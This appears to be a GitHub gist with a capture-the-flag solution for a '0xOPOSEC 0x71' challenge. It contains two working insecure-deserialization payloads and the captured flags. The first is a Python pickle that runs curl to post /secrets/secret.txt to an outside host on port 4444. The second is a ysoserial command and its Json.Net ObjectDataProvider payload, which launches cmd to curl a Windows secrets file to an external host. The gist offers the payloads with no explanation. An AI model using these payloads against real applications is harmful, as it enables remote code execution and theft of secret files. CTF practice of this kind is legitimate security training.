Skip to content

Instantly share code, notes, and snippets.

@ricardojba

ricardojba/0xOPOSEC 0x71 Challenge

Created February 8, 2019 15:15
Show Gist options
  • Save ricardojba/7c5503bb04fd3bcc566308d13e978bd7 to your computer and use it in GitHub Desktop.
Save ricardojba/7c5503bb04fd3bcc566308d13e978bd7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
0xOPOSEC 0x71 Challenge
cposix
system
p0
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'
p1
tp2
Rp3
.
FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!}
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "curl -d @c:/secrets/secret.txt http://myhost:4444" -o raw
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd','/c curl -d @c:/secrets/secret.txt http://v1brio.ml:4444']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
FLAG{N3v3r_U5e_TyP3N4m3H4dNl1nG_4g41n!}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment